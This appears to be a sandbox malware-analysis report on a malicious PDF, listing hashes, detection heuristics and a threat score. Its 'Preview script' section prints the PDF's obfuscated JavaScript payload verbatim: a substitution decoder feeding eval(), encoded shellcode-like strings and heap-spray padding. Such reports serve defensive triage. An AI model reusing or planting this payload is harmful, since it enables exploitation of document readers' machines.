Malicious PDF — malware analysis report

Static analysis result for SHA-256 cbfb71c45dee5ce2…

MALICIOUS

PDF

8.0 KB Created: 2009-04-20 07:08:04 Authoring application: gG1PnSY (via npa21xlmxlPk) First seen: 2026-05-08
MD5: 8b97bd42a8bdc6a4f2f2ffb01199f2f7 SHA-1: 07c5b45a66c8a75a67bdd4613ac4c41b4ed50ab3 SHA-256: cbfb71c45dee5ce24276852dcfa58e159474cc6e2e870124ca6afe5eac8c815a
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious code. The extracted JavaScript object, javascript_obj0007_000.js, likely contains the obfuscated payload. The eval() call is a strong indicator of malicious intent, potentially to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    P>CBF>1If<iU\r\niiiiiiii8MeiF7tnXAji=iGj.iheeMaf<;\r\niiiiiiiiiiiiiiii0sG,vtXGiMW.{Tdkfk{tdPYli6JrnXk.VD4F<iU\r\niiiiiiiiiiiiiiiiiiiiiiii.Jt{jifk{tdPYw{jG2vJ*TH6JrnXk.VD4F<Uk{tdPYi+=ik{tdPY;)\r\niiiiiiiiiiiiiiiiiiiiiiiik{tdPYi=ik{tdPYwgsZgvetG2f3l6JrnXk.VD4F/T<;\r\niiiiiiiiiiiiiiiiiiiiiiiiejvseGik{tdPY;\r\niiiiiiiiiiiiiiii)\r\n\r\niiiiiiiiiiiiiiii0sG,vtXGi1VdT(taf<iU\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei9hLR1tLnANosi=i3L3,3,3,3,;\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei7(,W uCuMYLJi=isGjg,M9jf\"%s5K5K%s5K5K%s5 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23B 6834 bytes
SHA-256: 0284ed177ac2d0b21bb93b5d35d987ef61fb3fe21c372bd62a4ff9ff3aa77101
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 78 of 146 identifiers look randomly generated (e.g. 'VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function VBwzklmSzA(VBwzklmSzA,RkW9taHFxTn) {var ChWhYa=VBwzklmSzA. substr (RkW9taHFxTn, 1);return ChWhYa;}/*IGrPH8J8zob|A6glAaMyu5r18POgnp7w|oB3mK2czUcyQ8ZQZm*/function Q3cbUCd2NF29X(SoORIZXv7fv) {/*JixBgC|Cq49cqoe|RpcuewMSCKsTkV*/var zQVOxmHQDcSgUglNf9my = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*t3LuZO9c44c[kG1KXhmHCZU]cfDvFYKyRV*//*rjiJedl1DrtOFR|NTQhotCseIGp6YBfFl|PFh07l*/var AGvQehO9TMykiCX /*q0o7r1R8Z5rcn[ku1hI2DO]HdjpUgR2NHgL*/= new String("Hpf<U)iwlhzdSRoAq1Omb }4(E7IrnWxPyCMZ,6j02JtBu{kGX9Fegvs8.Lac3QTK5DN>VY");/*YcxyXfRBr2vjZ3cdI6|mfQ6CiyPpVbeu3|jRx0SfsDE*/for(KoNm7u7=0;KoNm7u7<zQVOxmHQDcSgUglNf9my.length;KoNm7u7++) {if(SoORIZXv7fv == VBwzklmSzA(AGvQehO9TMykiCX, KoNm7u7)) {/*AglFcMr[doBBdQqysLjldI3R8Lwr]AzMYbR1n*/return VBwzklmSzA(zQVOxmHQDcSgUglNf9my, KoNm7u7);/*zGn0HGHy5zAfbenUvmgi <vZJ7xkPoOP]U2Vc9dR5SRau*/}}return SoORIZXv7fv;}/*DFiplG9WgITUsj96y[RrzurSBmlTDV]HanxBu*//*YQ5rloRkkFE2x3meM|Hx8LIDSjrFlc29s|rUb84CE9513iWFMd2*/var f1E3tpQG = new String;var R301f = new String("9Tn8aSN=sGjg,M9jf\"%s5K5K%s5K5K%s5K5K%s3oRz%sKKDz%sNNdY%sV3zY%sV33Q%sRoKK%sRT5K%sRzoh%sRV3D%sooRd%soooo%sVz>o%sSo5R%sRoRo%sN5Ro%sRKho%sYoN5%s5ToK%sYoN5%sNRR>%sRo3K%sRoRz%sN5Ro%szY3K%sNQV>%sRQhQ%s3>3K%sRoQQ%sRoRo%shhNN%szYRz%s>>V>%sNDQQ%s3>RQ%sRoQo%sRoRo%shhNN%szYR>%sdhV>%sQ3Do%s3>TS%sRo3S%sRoRo%shhNN%szYRK%s33V>%s3oTQ%s3>Vo%sRoKz%sRoRo%shhNN%szYoo%sTRV>%s3hYN%s3>D>%sRoTY%sRoRo%shhNN%shooz%sS>No%sYhTd%sNNQD%so>hh%sRV3N%sRoRR%szQRo%sYhNN%sN5dz%sRzhh%sRRVD%sN5zN%so>zh%s3>zY%sRoN5%sRoRo%sV>zo%soDSY%sYod3%s>V3>%sRoRo%sNNRo%soKhh%sThN5%sToNd%sNNzo%sdohh%sQ3V>%sRoRo%szoRo%shhN5%sVDoz%szNRS%szhN5%s3>o>%sRoVR%sRoRo%shhRd%sTVdo%szKRo%sdQYQ%sTVVh%sRzho%sVhY>%sRoRo%sYhQ3%sN5do%sRKhh%sRRVD%sN5zN%so>zh%sho3>%sRoRo%sVDRo%sz>RV%shhRd%sSddz%szdK5%sQ3zd%sdoYh%szdzo%shhN5%sVDoK%szNRh%szhN5%s3>o>%sRodd%sRoRo%sRoVD%sYhQ3%sN5do%sR>hh%sRSVD%sN5zN%so>zh%soo3>%sRoRo%sVDRo%sN5Q3%soohh%sRRVD%sN5zN%so>zh%sRo3>%sRoRo%shRRo%szSz5%s3RRd%s3RRd%s3RRd%s3RRd%s3KNd%szDRz%sN5zd%s3SKD%szSQV%s3oQ3%sN5zh%sN53K%sR>YT%szTN5%szYRK%sYdN5%sN5SK%soQYz%sRdY>%szYQd%sYYN5%sRddo%sSdQd%shNTN%s5ThR%sTdRd%sSdzY%sR3QY%sooDQ%sQSSD%sR>Yz%sTQTR%sRdRT%shoQS%sQR35%sQQS5%sYhzQ%szD3h%s35N5%szDN5%sRddz%sVYKT%sRKN5%sN5h5%soKzD%sKTRd%sRzN5%sRdN5%szQTh%sTSzT%sRoR>%sQz3>%sQ3QQ%szhQ3%shKzS%sh3hT%sRohQ%s>5NV%s>3>5%sToKh%s>KTo%sNd>3%sN5No%s>YNQ%sNKTR%sNSNo%sN>To%sToNo%sNoNd%sN5NQ%s>3TR%s>3NV\"<;\r\niiiiiiiiiiiiiiii8MeiMTeVr=sGjg,M9jf\"%s3h3h%s3h3h\"<;8MeiGk=T3;8Mei02=Gk+9Tn8aSNw{jG2vJ;.Jt{jfMTeVrw{jG2vJH02<MTeVr+=MTeVr;8MeiGkZe=MTeVrwgsZgvetG2f3l02<;8Meigvt2=MTeVrwgsZgvetG2f3lMTeVrw{jG2vJ-02<;.Jt{jfgvt2w{jG2vJ+02H3LN3333<gvt2=gvt2+gvt2+GkZe;8MeiMeek=Gj.iheeMaf<;0Xeftc=3;tcHQT33;tc++<UMeek[tc]=gvt2+9Tn8aSN)8Mei1CZzccEz}P=\"QTY\"+\"YYYYYYYY\"+\"YYYYY\"+\"YYYY\"+\"VVVVVVV\"+\"VVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\"+\"VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\"+\"VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\"+\"VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\"+\"VVVVVVVVVVVVV\"+\"VVVVVVVVVVVVVVVVVVV\"+\"VVVVVVVVVVVVVV\";svt{w9etGv0f\"%5D3330\"l1CZzccEz}P<;0sG,vtXGi(P>CBF>1If<iU\r\niiiiiiii8MeiF7tnXAji=iGj.iheeMaf<;\r\niiiiiiiiiiiiiiii0sG,vtXGiMW.{Tdkfk{tdPYli6JrnXk.VD4F<iU\r\niiiiiiiiiiiiiiiiiiiiiiii.Jt{jifk{tdPYw{jG2vJ*TH6JrnXk.VD4F<Uk{tdPYi+=ik{tdPY;)\r\niiiiiiiiiiiiiiiiiiiiiiiik{tdPYi=ik{tdPYwgsZgvetG2f3l6JrnXk.VD4F/T<;\r\niiiiiiiiiiiiiiiiiiiiiiiiejvseGik{tdPY;\r\niiiiiiiiiiiiiiii)\r\n\r\niiiiiiiiiiiiiiii0sG,vtXGi1VdT(taf<iU\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei9hLR1tLnANosi=i3L3,3,3,3,;\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei7(,W uCuMYLJi=isGjg,M9jf\"%s5K5K%s5K5K%s5K5K%s3oRz%sKKDz%sNNdY%sV3zY%sV33Q%sRoKK%sRT5K%sRzoh%sRV3D%sooRd%soooo%sVz>o%sSo5R%sRoRo%sN5Ro%sRKho%sYoN5%s5ToK%sYoN5%sNRR>%sRo3K%sRoRz%sN5Ro%szY3K%sNQV>%sRQhQ%s3>3K%sRoQQ%sRoRo%shhNN%szYRz%s>>V>%sNDQQ%s3>RQ%sRoQo%sRoRo%shhNN%szYR>%sdhV>%sQ3Do%s3>TS%sRo3S%sRoRo%shhNN%szYRK%s33V>%s3oTQ%s3>Vo%sRoKz%sRoRo%shhNN%szYoo%sTRV>%s3hYN%s3>D>%sRoTY%sRoRo%shhNN%shooz%sS>No%sYhTd%sNNQD%so>hh%sRV3N%sRoRR%szQRo%sYhNN%sN5dz%sRzhh%sRRVD%sN5zN%so>zh%s3>zY%sRoN5%sRoRo%sV>zo%soDSY%sYod3%s>V3>%sRoRo%sNNRo%soKhh%sThN5%sToNd%sNNzo%sdohh%sQ3V>%sRoRo%szoRo%shhN5%sVDoz%szNRS%szhN5%s3>o>%sRoVR%sRoRo%shhRd%sTVdo%szKRo%sdQYQ%sTVVh%sRzho%sVhY>%sRoRo%sYhQ3%sN5do%sRKhh%sRRVD%sN5zN%so>zh%sho3>%sRoRo%sVDRo%sz>RV%shhRd%sSddz%szdK5%sQ3zd%sdoYh%szdzo%shhN5%sVDoK%szNRh%szhN5%s3>o>%sRodd%sRoRo%sRoVD%sYhQ3%sN5do%sR>hh%sRSVD%sN5zN%so>zh%soo3>%sRoRo%sVDRo%sN5Q3%soohh%sRRVD%sN5zN%so>zh%sRo3>%sRoRo%shRRo%szSz5%s3RRd%s3RRd%s3RRd%s3RRd%s3KNd%szDRz%sN5zd%s3SKD%szSQV%s3oQ3%sN5zh%sN53K%sR>YT%szTN5%szYRK%sYdN5%sN5SK%soQYz%sRdY>%szYQd%sYYN5%sRddo%sSdQd%shNTN%s5ThR%sTdRd%sSdzY%sR3QY%sooDQ%sQSSD%sR>Yz%sTQTR%sRdRT%shoQS%sQR35%sQQS5%sYhzQ%szD3h%s35N5%szDN5%sRddz%sVYKT%sRKN5%sN5h5%soKzD%sKTRd%sRzN5%sRdN5%szQTh%sTSzT%sRoR>%sQz3>%sQ3QQ%szhQ3%shKzS%sh3hT%sRohQ%s>5NV%s>3>5%sToKh%s>KTo%sNd>3%sN5No%s>YNQ%sNKTR%sNSNo%sN>To%sToNo%sNoNd%sN5NQ%s>3TR%s>3NV%sNYKo%sKSN5%s>KTN%sNd>3%sK5KS\"<;\r\niiiiiiiiiiiiiiiiiiiiiiii8MeinVsvPxi=i3L533333;\r\niiiiiiiiiiiiiiiiiiiiiiii8MeiaALje>ZC7M2WPi=i7(,W uCuMYLJw{jG2vJi*iT;\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei6JrnXk.VD4Fi=inVsvPxi-ifaALje>ZC7M2WP+3LKV<;\r\niiiiiiiiiiiiiiiiiiiiiiii8Meik{tdPYi=isGjg,M9jf\"%sY3Y3%sY3Y3\"<;\r\niiiiiiiiiiiiiiiiiiiiiiiik{tdPYi=iMW.{Tdkfk{tdPYli6JrnXk.VD4F<;\r\niiiiiiiiiiiiiiiiiiiiiiii8Meir2d >3 Ti=if9hLR1tLnANosi-i3L533333</nVsvPx;\r\n\r\niiiiiiiiiiiiiiiiiiiiiiii0Xeif8Meio>5LqGYRKE.Q8S=3;o>5LqGYRKE.Q8SHr2d >3 T;o>5LqGYRKE.Q8S++<iU\r\niiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiF7tnXAj[o>5LqGYRKE.Q8S]i=ik{tdPYi+i7(,W uCuMYLJ;\r\niiiiiiiiiiiiiiiiiiiiiiii)\r\niiiiiiiiiiiiiiii)\r\n\r\niiiiiiiiiiiiiiii0sG,vtXGi1dn NTvr8f<iU\r\niiiiiiiiiiiiiiiiiiiiiiii8MeiMCKyzZc{1i=iM99w8tj.jeWjegtXGwvXIvetG2f<;\r\niiiiiiiiiiiiiiiiiiiiiiiiMCKyzZc{1i=iMCKyzZc{1wej9{M,jf/\\S/2l\"\"<;\r\niiiiiiiiiiiiiiiiiiiiiiii8Mei,A9crzN6i=iGj.iheeMafMCKyzZc{1w,JMehvf3<lMCKyzZc{1w,JMehvfQ<lMCKyzZc{1w,JMehvfT<<;\r\niiiiiiiiiiiiiiiiiiiiiiiit0iff,A9crzN6[3]i==iVi&&iff,A9crzN6[Q]i==iQi&&i,A9crzN6[T]iHiT<i||i,A9crzN6[Q]iHiQ<<i||\r\niiiiiiiiiiiiiiiiiiiiiiiif,A9crzN6[3]i==i>i&&i,A9crzN6[Q]iHiQ<i||\r\niiiiiiiiiiiiiiiiiiiiiiiif,A9crzN6[3]iHi><<iU\r\niiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1VdT(taf<;\r\niiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii8MeiWQQOW}i=isGjg,M9jf\"%s3,3,%s3,3,\"<;\r\niiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii.Jt{jfWQQOW}w{jG2vJiHi55YDT<iWQQOW}i+=iWQQOW};\r\niiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivJtgw,X{{MZIvXeji=idX{{MZw,X{{j,vRkMt{1G0XfUgsZB:i\"\"lkg2:iWQQOW})<;\r\niiiiiiiiiiiiiiiiiiiiiiii)\r\niiiiiiiiiiiiiiii)\r\niiiiiiiiiiiiiiii1dn NTvr8f<;iiiii\n)iiiiiiii");/*oBP7l6C{Y5MHs3cK}WN6WIyPqKV3oOETQTQ*//*QTEpOQx7KPICmV98dx|K8jDmxI5|cM5sg*/for(JUehmE3lxTt3=0;JUehmE3lxTt3<R301f.length;JUehmE3lxTt3++)f1E3tpQG += Q3cbUCd2NF29X(VBwzklmSzA(R301f,JUehmE3lxTt3));eval(f1E3tpQG);/*XvQKtaa1cCNbArPO1Ny5[lEvpg8kOekmP1x9RN0]PDMQvbempTif4mRkI*/

Open this report in the interactive analyzer, or submit your own file for analysis.